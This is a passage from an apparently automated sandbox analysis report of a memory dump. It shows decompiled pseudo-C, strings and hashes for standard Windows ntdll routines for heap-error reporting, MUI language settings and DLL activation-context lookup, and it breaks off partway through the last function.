                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 9cb18b6fed12162dcfbe7e53f712ec6a71720fd9f8c402fb9e59208c3e347836
                                                                      • Instruction ID: 7e4cd704267a1f972b1dc4b137c1656c7f540a9b1663b43e4be52149549e16b8
                                                                      • Opcode Fuzzy Hash: 9cb18b6fed12162dcfbe7e53f712ec6a71720fd9f8c402fb9e59208c3e347836
                                                                      • Instruction Fuzzy Hash: 30B09BB19414D5C5DA15D7A45708717790077D0745F16C055D1020645B4778C091F6B5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 0123B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • <unknown>, xrefs: 0123B27E, 0123B2D1, 0123B350, 0123B399, 0123B417, 0123B48E
                                                                      • *** then kb to get the faulting stack, xrefs: 0123B51C
                                                                      • *** Inpage error in %ws:%s, xrefs: 0123B418
                                                                      • The resource is owned shared by %d threads, xrefs: 0123B37E
                                                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0123B2F3
                                                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0123B314
                                                                      • write to, xrefs: 0123B4A6
                                                                      • The resource is owned exclusively by thread %p, xrefs: 0123B374
                                                                      • an invalid address, %p, xrefs: 0123B4CF
                                                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0123B47D
                                                                      • The instruction at %p tried to %s , xrefs: 0123B4B6
                                                                      • *** enter .cxr %p for the context, xrefs: 0123B50D
                                                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0123B53F
                                                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0123B39B
                                                                      • The instruction at %p referenced memory at %p., xrefs: 0123B432
                                                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0123B305
                                                                      • The critical section is owned by thread %p., xrefs: 0123B3B9
                                                                      • read from, xrefs: 0123B4AD, 0123B4B2
                                                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 0123B352
                                                                      • Go determine why that thread has not released the critical section., xrefs: 0123B3C5
                                                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0123B3D6
                                                                      • This failed because of error %Ix., xrefs: 0123B446
                                                                      • *** enter .exr %p for the exception record, xrefs: 0123B4F1
                                                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0123B38F
                                                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0123B323
                                                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0123B476
                                                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0123B484
                                                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0123B2DC
                                                                      • *** An Access Violation occurred in %ws:%s, xrefs: 0123B48F
                                                                      • a NULL pointer, xrefs: 0123B4E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                      • API String ID: 0-108210295
                                                                      • Opcode ID: 4e8f817446ee11460009ed8b9f9a858b9b1d600239fdbc5ff7cbf16e56ef2afb
                                                                      • Instruction ID: 9c43c6ae5780850c67dee4b43554c279bb22557e997771f600dc3511fad9a4fd
                                                                      • Opcode Fuzzy Hash: 4e8f817446ee11460009ed8b9f9a858b9b1d600239fdbc5ff7cbf16e56ef2afb
                                                                      • Instruction Fuzzy Hash: 1181F7B5A60211BFDF2A9F4A9C47E7B3B76EFE7A51F004088F6042B252D3618552C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01241C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 44%
                                                                      			E01241C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x11648a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0118B150();
				} else {
					E0118B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x127589c);
				E0118B150("Heap error detected at %p (heap handle %p)\n",  *0x12758a0);
				_t27 =  *0x1275898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01241E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0118B150();
				} else {
					E0118B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0118B150("Error code: %d - %s\n",  *0x1275898);
				_t113 =  *0x12758a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0118B150();
					} else {
						E0118B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0118B150("Parameter1: %p\n",  *0x12758a4);
				}
				_t115 =  *0x12758a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0118B150();
					} else {
						E0118B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0118B150("Parameter2: %p\n",  *0x12758a8);
				}
				_t117 =  *0x12758ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0118B150();
					} else {
						E0118B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0118B150("Parameter3: %p\n",  *0x12758ac);
				}
				_t119 =  *0x12758b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0118B150();
					} else {
						E0118B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x12758b4);
					E0118B150("Last known valid blocks: before - %p, after - %p\n",  *0x12758b0);
				} else {
					_t120 =  *0x12758b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0118B150();
				} else {
					E0118B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0118B150("Stack trace available at %p\n", 0x12758c0);
			}











                                                                      0x01241c10
                                                                      0x01241c16
                                                                      0x01241c1e
                                                                      0x01241c3d
                                                                      0x01241c3e
                                                                      0x01241c20
                                                                      0x01241c35
                                                                      0x01241c3a
                                                                      0x01241c44
                                                                      0x01241c55
                                                                      0x01241c5a
                                                                      0x01241c65
                                                                      0x01241c67
                                                                      0x00000000
                                                                      0x01241c6e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01241c67
                                                                      0x01241cdc
                                                                      0x01241ce5
                                                                      0x01241d04
                                                                      0x01241d05
                                                                      0x01241ce7
                                                                      0x01241cfc
                                                                      0x01241d01
                                                                      0x01241d0b
                                                                      0x01241d17
                                                                      0x01241d1f
                                                                      0x01241d25
                                                                      0x01241d30
                                                                      0x01241d4f
                                                                      0x01241d50
                                                                      0x01241d32
                                                                      0x01241d47
                                                                      0x01241d4c
                                                                      0x01241d61
                                                                      0x01241d67
                                                                      0x01241d68
                                                                      0x01241d6e
                                                                      0x01241d79
                                                                      0x01241d98
                                                                      0x01241d99
                                                                      0x01241d7b
                                                                      0x01241d90
                                                                      0x01241d95
                                                                      0x01241daa
                                                                      0x01241db0
                                                                      0x01241db1
                                                                      0x01241db7
                                                                      0x01241dc2
                                                                      0x01241de1
                                                                      0x01241de2
                                                                      0x01241dc4
                                                                      0x01241dd9
                                                                      0x01241dde
                                                                      0x01241df3
                                                                      0x01241df9
                                                                      0x01241dfa
                                                                      0x01241e00
                                                                      0x01241e0a
                                                                      0x01241e13
                                                                      0x01241e32
                                                                      0x01241e33
                                                                      0x01241e15
                                                                      0x01241e2a
                                                                      0x01241e2f
                                                                      0x01241e39
                                                                      0x01241e4a
                                                                      0x01241e02
                                                                      0x01241e02
                                                                      0x01241e08
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01241e08
                                                                      0x01241e5b
                                                                      0x01241e7a
                                                                      0x01241e7b
                                                                      0x01241e5d
                                                                      0x01241e72
                                                                      0x01241e77
                                                                      0x01241e95

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                      • API String ID: 0-2897834094
                                                                      • Opcode ID: b394ff35433ed15574028a517b8a85dbfba3a3310f666b71155072d02c890dc3
                                                                      • Instruction ID: 7b883fb822d4feaf272dff26cbebbcebcecbb300f1bb68d48c43cce8101eb0f8
                                                                      • Opcode Fuzzy Hash: b394ff35433ed15574028a517b8a85dbfba3a3310f666b71155072d02c890dc3
                                                                      • Instruction Fuzzy Hash: 6161C736536145DFD21DAB49E989E2573F4EB04E24B0DC0AAF5096F311D774A8E08F0E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01193D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 96%
                                                                      			E01193D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01191B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L011A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01191B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L011A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01191B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01191B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01191B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L011A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L011A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L011A4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E011CF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E011D1370(_t276, 0x1164e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E011CBB40(0,  &_v68, _t170);
									if(L011943C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L011A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L011A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E011CBB40(_t257,  &_v68, _t243);
								if(L011943C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E011D1370(_t278, 0x1164e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L011A4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E011CF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E011D1370(_v16, 0x1164e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E011CBB40(_t262,  &_v68, _t244);
								if(L011943C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E011D1370(_t282, 0x1164e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E011CBB40(_t262,  &_v68, _t201);
							if(L011943C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L011A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L011A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L011A4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E011CF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E011D1370(_t280, 0x1164e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E011CBB40(_t267,  &_v68, _t245);
							if(L011943C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E011D1370(_t284, 0x1164e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E011CBB40(_t267,  &_v68, _t224);
						if(L011943C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L011A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L011A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                      0x01193d3c
                                                                      0x01193d42
                                                                      0x01193d44
                                                                      0x01193d46
                                                                      0x01193d49
                                                                      0x01193d4c
                                                                      0x01193d4f
                                                                      0x01193d52
                                                                      0x01193d55
                                                                      0x01193d58
                                                                      0x01193d5b
                                                                      0x01193d5f
                                                                      0x01193d61
                                                                      0x01193d66
                                                                      0x011e8213
                                                                      0x011e8218
                                                                      0x01194085
                                                                      0x01194088
                                                                      0x0119408e
                                                                      0x01194094
                                                                      0x0119409a
                                                                      0x011940a0
                                                                      0x011940a6
                                                                      0x011940a9
                                                                      0x011940af
                                                                      0x011940b6
                                                                      0x011940bd
                                                                      0x011940bd
                                                                      0x01193d83
                                                                      0x011e821f
                                                                      0x011e8229
                                                                      0x011e8238
                                                                      0x011e8238
                                                                      0x011e823d
                                                                      0x011e823d
                                                                      0x01193da0
                                                                      0x01193daf
                                                                      0x01193db5
                                                                      0x01193dba
                                                                      0x01193dba
                                                                      0x01193dd4
                                                                      0x01193e94
                                                                      0x01193eab
                                                                      0x01193f6d
                                                                      0x01193f84
                                                                      0x0119406b
                                                                      0x0119406b
                                                                      0x0119406e
                                                                      0x0119406e
                                                                      0x01194070
                                                                      0x01194074
                                                                      0x011e8351
                                                                      0x011e8351
                                                                      0x0119407a
                                                                      0x0119407f
                                                                      0x011e835d
                                                                      0x011e8370
                                                                      0x011e8377
                                                                      0x011e8379
                                                                      0x011e837c
                                                                      0x011e837c
                                                                      0x011e835d
                                                                      0x00000000
                                                                      0x0119407f
                                                                      0x01193f8a
                                                                      0x01193f8d
                                                                      0x01193f90
                                                                      0x01193f95
                                                                      0x011e830d
                                                                      0x011e830f
                                                                      0x01193f9b
                                                                      0x01193fac
                                                                      0x01193fae
                                                                      0x01193fb1
                                                                      0x01193fb1
                                                                      0x01193fb6
                                                                      0x011e8317
                                                                      0x011e831a
                                                                      0x00000000
                                                                      0x01193fbc
                                                                      0x01193fc1
                                                                      0x01193fc9
                                                                      0x01193fd7
                                                                      0x01193fda
                                                                      0x01193fdd
                                                                      0x01194021
                                                                      0x01194021
                                                                      0x01194029
                                                                      0x01194030
                                                                      0x01194044
                                                                      0x01194046
                                                                      0x01194046
                                                                      0x01194044
                                                                      0x01194049
                                                                      0x011e8327
                                                                      0x011e8334
                                                                      0x011e8339
                                                                      0x011e833c
                                                                      0x0119404f
                                                                      0x0119404f
                                                                      0x0119404f
                                                                      0x01194051
                                                                      0x01194056
                                                                      0x01194063
                                                                      0x01194063
                                                                      0x01194068
                                                                      0x00000000
                                                                      0x01194068
                                                                      0x01193fdf
                                                                      0x01193fe2
                                                                      0x01193fe4
                                                                      0x01193fe7
                                                                      0x01193fef
                                                                      0x01194003
                                                                      0x01194005
                                                                      0x01194005
                                                                      0x0119400c
                                                                      0x01194013
                                                                      0x01194016
                                                                      0x01194017
                                                                      0x0119401b
                                                                      0x0119401e
                                                                      0x00000000
                                                                      0x0119401e
                                                                      0x01193fb6
                                                                      0x01193eb1
                                                                      0x01193eb4
                                                                      0x01193eb7
                                                                      0x01193ebc
                                                                      0x011e82a9
                                                                      0x011e82ab
                                                                      0x01193ec2
                                                                      0x01193ed3
                                                                      0x01193ed5
                                                                      0x01193ed8
                                                                      0x01193ed8
                                                                      0x01193edd
                                                                      0x011e82b3
                                                                      0x011e82b6
                                                                      0x00000000
                                                                      0x01193ee3
                                                                      0x01193ee8
                                                                      0x01193eed
                                                                      0x01193ef0
                                                                      0x01193ef3
                                                                      0x01193f02
                                                                      0x01193f05
                                                                      0x01193f08
                                                                      0x011e82c0
                                                                      0x011e82c3
                                                                      0x011e82c5
                                                                      0x011e82c8
                                                                      0x011e82d0
                                                                      0x011e82e4
                                                                      0x011e82e6
                                                                      0x011e82e6
                                                                      0x011e82ed
                                                                      0x011e82f4
                                                                      0x011e82f7
                                                                      0x011e82f8
                                                                      0x011e82fc
                                                                      0x011e82ff
                                                                      0x011e82ff
                                                                      0x01193f0e
                                                                      0x01193f11
                                                                      0x01193f16
                                                                      0x01193f1d
                                                                      0x01193f31
                                                                      0x011e8307
                                                                      0x011e8307
                                                                      0x01193f31
                                                                      0x01193f39
                                                                      0x01193f48
                                                                      0x01193f4d
                                                                      0x01193f50
                                                                      0x01193f50
                                                                      0x01193f53
                                                                      0x01193f58
                                                                      0x01193f65
                                                                      0x01193f65
                                                                      0x01193f6a
                                                                      0x00000000
                                                                      0x01193f6a
                                                                      0x01193edd
                                                                      0x01193dda
                                                                      0x01193ddd
                                                                      0x01193de0
                                                                      0x01193de5
                                                                      0x011e8245
                                                                      0x01193deb
                                                                      0x01193df7
                                                                      0x01193dfc
                                                                      0x01193dfe
                                                                      0x01193e01
                                                                      0x01193e01
                                                                      0x01193e06
                                                                      0x011e824d
                                                                      0x011e824f
                                                                      0x011e8254
                                                                      0x00000000
                                                                      0x01193e0c
                                                                      0x01193e11
                                                                      0x01193e16
                                                                      0x01193e19
                                                                      0x01193e29
                                                                      0x01193e2c
                                                                      0x01193e2f
                                                                      0x011e825c
                                                                      0x011e825f
                                                                      0x011e8261
                                                                      0x011e8264
                                                                      0x011e826c
                                                                      0x011e8280
                                                                      0x011e8282
                                                                      0x011e8282
                                                                      0x011e8289
                                                                      0x011e8290
                                                                      0x011e8293
                                                                      0x011e8294
                                                                      0x011e8298
                                                                      0x011e829b
                                                                      0x011e829b
                                                                      0x01193e35
                                                                      0x01193e38
                                                                      0x01193e3d
                                                                      0x01193e44
                                                                      0x01193e58
                                                                      0x011e82a3
                                                                      0x011e82a3
                                                                      0x01193e58
                                                                      0x01193e60
                                                                      0x01193e6f
                                                                      0x01193e74
                                                                      0x01193e77
                                                                      0x01193e77
                                                                      0x01193e7a
                                                                      0x01193e7f
                                                                      0x01193e8c
                                                                      0x01193e8c
                                                                      0x01193e91
                                                                      0x00000000
                                                                      0x01193e91

                                                                      Strings
                                                                      • WindowsExcludedProcs, xrefs: 01193D6F
                                                                      • Kernel-MUI-Language-SKU, xrefs: 01193F70
                                                                      • Kernel-MUI-Number-Allowed, xrefs: 01193D8C
                                                                      • Kernel-MUI-Language-Allowed, xrefs: 01193DC0
                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 01193E97
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                      • API String ID: 0-258546922
                                                                      • Opcode ID: 652b8e3c6cf39773946c6c1d8fe26a61c77af69991f2e8cfbcb1323a24684f35
                                                                      • Instruction ID: 0badbaa2a5d7e31d1caf2c38c9338235a2cd749c1c1a8c3a8ff26d2b999f2693
                                                                      • Opcode Fuzzy Hash: 652b8e3c6cf39773946c6c1d8fe26a61c77af69991f2e8cfbcb1323a24684f35
                                                                      • Instruction Fuzzy Hash: 52F16C76D00619EFCF19DFE8C980AEEBBB9FF08650F15005AE915A7650E7359E01CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011B8E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 44%
                                                                      			E011B8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x127d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1278464; // 0x75150110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1275780 & 0x00000003) != 0) {
							E01205510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1275780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E011CB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1277984; // 0xd22b48
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1278464; // 0x75150110
					 *0x127b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
